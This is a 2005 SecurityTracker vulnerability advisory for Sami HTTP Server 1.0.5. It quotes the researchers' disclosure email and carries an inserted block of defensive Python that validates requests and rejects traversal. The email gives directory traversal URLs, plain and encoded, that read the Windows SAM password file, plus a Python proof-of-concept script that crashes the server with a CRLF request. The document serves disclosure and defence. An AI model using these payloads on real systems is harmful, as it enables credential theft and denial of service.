Sami HTTP Server Input Validation Holes Disclose Files to Remote Users and Let Remote Users Crash the Service
|
|
SecurityTracker Alert ID: 1013191
|
|
SecurityTracker URL: http://securitytracker.com/id?1013191
|
|
CVE Reference: GENERIC-MAP-NOMATCH
|
Date: Feb 15 2005
|
Impact: Denial of service via network, Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Advisory: Global Security Solution IT (GSSIT)
|
Version(s): 1.0.5
|
Description: Ziv Kamir of Global Security Solution IT reported a vulnerability in Sami HTTP Server. A remote user can view files on the target system or cause the web service to crash.
A remote user can send a specially crafted HTTP request containing '../' directory traversal characters to obtain files on the system that are located outside of the web document directory. Encoded directory traversal characters can also be used.
Some demonstration exploit URLs are provided:
http://[target]/../../winnt/repair/sam
http://[target]/%2e%2e/%2e%2e/winnt/repair/sam
A remote user can also send an HTTP request with two Carriage Return (CR) and Line Feed (LF) characters ('\x0d\x0a') to cause the web service to crash.
The vendor was notified on February 6, 2005 without response.
|
Impact: A remote user can view files on the target system that are located outside of the web document directory.
A remote user can cause the target web service to crash.
|
Solution: No solution was available at the time of this entry.
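The two checks whose absence the description points to, as an added example that is not code from the advisory or from Sami HTTP Server: an empty request gets a 400 instead of being parsed further, and the request target is percent-decoded once and refused if any segment is '..'. The document root `/srv/www`, the function names, and the backslash handling (a generalization for Windows hosts, not stated in the advisory) are assumptions.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/srv/www"  # assumed document root (hypothetical)

def parse_request_line(raw: bytes):
    """Return (method, target, version), or None for an empty or malformed request."""
    line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    parts = line.split(" ")
    # A request that is only CRLF CRLF yields an empty first line: reject it
    # here rather than letting later code index into missing fields.
    if len(parts) != 3 or not parts[1].startswith("/"):
        return None
    return tuple(parts)

def resolve(target: str, docroot: str = DOCROOT):
    """Map a request target to a path under docroot, or None if it would escape."""
    # Decode exactly once, BEFORE the traversal check, so %2e%2e is seen as '..'.
    path = unquote(target.split("?", 1)[0])
    # Assumption: on Windows a backslash is also a path separator.
    path = path.replace("\\", "/")
    if "\x00" in path:
        return None
    segments = [s for s in path.split("/") if s not in ("", ".")]
    # Stricter than normalising: any '..' segment is refused outright.
    if ".." in segments:
        return None
    return posixpath.join(docroot, *segments)

def handle(raw: bytes):
    """Return (status, filesystem_path) for a raw request; path is None on error."""
    req = parse_request_line(raw)
    if req is None:
        return 400, None
    path = resolve(req[1])
    if path is None:
        return 403, None
    return 200, path
```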
|
Vendor URL: www.karja.com/samihttp/
|
Cause: Exception handling error, Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: GSS IT <gss_it@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 15 Feb 2005 03:34:13 -0800 (PST)
From: GSS IT <gss_it@yahoo.com>
Subject: Sami HTTP Web Server Ver 1.0.5
|
Web : www.gssit.co.il
Content-Type: text/plain; name="Sami.txt"
Content-Description: Sami.txt
Content-Disposition: inline; filename="Sami.txt"
15/02/05
====================================
GSSIT - Global Security Solution IT
====================================
-------------------------------------------------------
Application: Sami HTTP Server
Web Site: www.karja.com
Versions: 1.0.5
Platform: Windows
Credits:
########
#########################################
# == Ziv Kamir == #
# #
# GSSIT - Global Security Solution IT #
# #
# WEB : www.gssit.co.il #
# #
# #
#########################################
---------------------
1) Introduction
2) Bugs
3) The Code
4) Fix
================
1) Introduction
================
Easy to set up webserver, for when you value simplicity and ease of use.
Some of the features are:
Simple setup, and runs on Windows 95/98/Me/NT/2000/XP
Full access to all the server's features from the main control in the system tray
Configuration with a few simple clicks; no need to edit configuration files or run a lengthy setup
Enable PHP support on Sami HTTP Server with a few clicks.
=======
2) Bugs
=======
1) A remote user can obtain files on the system that are located outside of the web document directory.
2) The web server can be crashed by sending two Carriage Return (CR) and Line Feed (LF) [ \x0d\x0a ].
===========
3) The Code
===========
1)
http://[Target]/../../winnt/repair/sam
http://[Target]/%2e%2e/%2e%2e/winnt/repair/sam
2)
#######################################################################################################
##############################################################
# GSS-IT Research And Security Labs #
##############################################################
# #
# www.gssit.co.il #
# #
##############################################################
# Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC #
##############################################################
# Use This PoC For Educational Purposes Only #
##############################################################
import sys
import socket
print("##########################################################\n")
print("# Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC #\n")
print("##########################################################\n\n")
if (len(sys.argv) < 3 ) :
    print "Usage: %s <Target> <Port>" %sys.argv[0]
    sys.exit(0)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = sys.argv[1]
port = int(sys.argv[2])
try:
    server.connect((target,port))
    print "Sending CRLF ...\n\n"
    server.send("\x0d\x0a\x0d\x0a")
    server.close()
    print "Done ... Check your web server"
except:
    print "Cannot connect to http server on %s" %target
#######################################################################################################
======
4) Fix
======
Date of Vendor Notification:
----------------------------
06/02/05
Response:
=========
No Response.
==============================================================================================
*** The Data is for educational purpose only. ***
The information in this bulletin is provided "AS IS" without
warranty of any kind. In no event shall we be liable for any
damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
==============================================================================================
|
|